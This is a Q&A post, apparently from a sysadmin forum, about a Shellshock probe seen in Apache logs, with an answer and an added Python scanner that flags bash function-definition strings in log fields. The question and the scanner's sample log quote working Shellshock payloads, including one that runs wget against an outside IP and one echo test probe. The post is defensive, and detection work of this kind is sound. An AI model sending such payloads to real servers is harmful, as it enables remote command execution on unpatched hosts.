How can one prevent Apache executing the request line as a bash command?

I'm running several virtual hosts on Apache 2.2.22 and just noticed a rather alarming incident in the logs where a "security scanner" from Iceland was able to wget a file into a cgi-bin directory with the following http request line:

() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"

It effectively downloaded the file in question. Could anyone explain how this request manages to actually execute the bash command?

Naturally, the cgi-bin shouldn't be writable, but it would still be helpful to understand how this type of exploit functions and if there isn't some way to change the Apache configuration parameters so that request commands are never executed ...

This may be unrelated, but several hours later, there has begun a stream of strange requests from the internal interface, occurring every 2 seconds:

host:    ":443"   request:  "NICK netply"    source ip: 127.0.0.1

Answers


This is a vulnerability in bash which is exposed via Apache, referred to as "Shellshock" or the "bash bug", and it allows an attacker to execute arbitrary commands both locally and remotely, making it a very serious vulnerability.

You need to update bash, but you are showing signs of an already compromised system. For more information on shellshock including detection and fixing, see:

digitalocean.com

shellshocker.net
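The answer names the bug but not the mechanism behind the request line in the question. Apache's mod_cgi copies request headers (User-Agent, Referer, and so on) into environment variables for the CGI process, and unpatched bash treated any exported value beginning with `() {` as a function definition and then ran whatever text followed the closing brace. That `() {` prefix is therefore the thing to look for when checking whether a host was probed. The following log scanner is an added example, not code from the original post or from either linked site; it parses Apache combined-format lines and flags any request, Referer or User-Agent field carrying that prefix. The log lines it runs on are constructed for the example (the first reuses the request string from the question); the function and field names are my own.

```python
import re
from typing import Dict, List

# Marker of a bash function-definition string: "() {" with optional whitespace.
# Unpatched bash imported such environment values as functions, so any HTTP
# header or request carrying it is a Shellshock probe, whatever follows it.
FUNC_DEF_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" log format. Quoted fields may contain \" escapes, which is
# how Apache writes the quotes seen in the request line from the question.
QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>' + QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + QUOTED + r')" "(?P<ua>' + QUOTED + r')"$'
)

# Constructed sample log (assumed format; not taken from the poster's server).
SAMPLE_LOG = """\
198.51.100.7 - - [25/Sep/2014:10:14:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \\"wget http://82.221.105.197/bash-count.txt\\""
198.51.100.8 - - [25/Sep/2014:10:14:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [25/Sep/2014:10:15:33 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :; }; echo vulnerable" "curl/7.37.0"
"""


def is_shellshock_probe(value: str) -> bool:
    """True if a header or request string starts a bash function definition."""
    return FUNC_DEF_RE.search(value) is not None


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one hit per log field that carries the "() {" marker.

    Each hit records the line number, client IP, which field carried the
    payload (request, referer, ua, or raw for unparseable lines) and the
    payload itself, so an operator can see which CGI scripts were targeted.
    """
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            # Unparseable line (custom LogFormat): still check the raw text
            # so a probe is not missed because of the format.
            if is_shellshock_probe(line):
                hits.append({"line": lineno, "ip": "?", "field": "raw", "payload": line})
            continue
        for field in ("request", "referer", "ua"):
            value = m.group(field)
            if is_shellshock_probe(value):
                hits.append({"line": lineno, "ip": m.group("ip"),
                             "field": field, "payload": value})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['ip']} via {hit['field']}: {hit['payload']}")
```

Run it against a real access log with `scan_log(open("/var/log/apache2/access.log").read())`; any hit against a path under cgi-bin on a host whose bash predates the fix should be treated as a likely compromise, which matches the answer's point that patching bash is necessary but no longer sufficient once a probe has succeeded.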
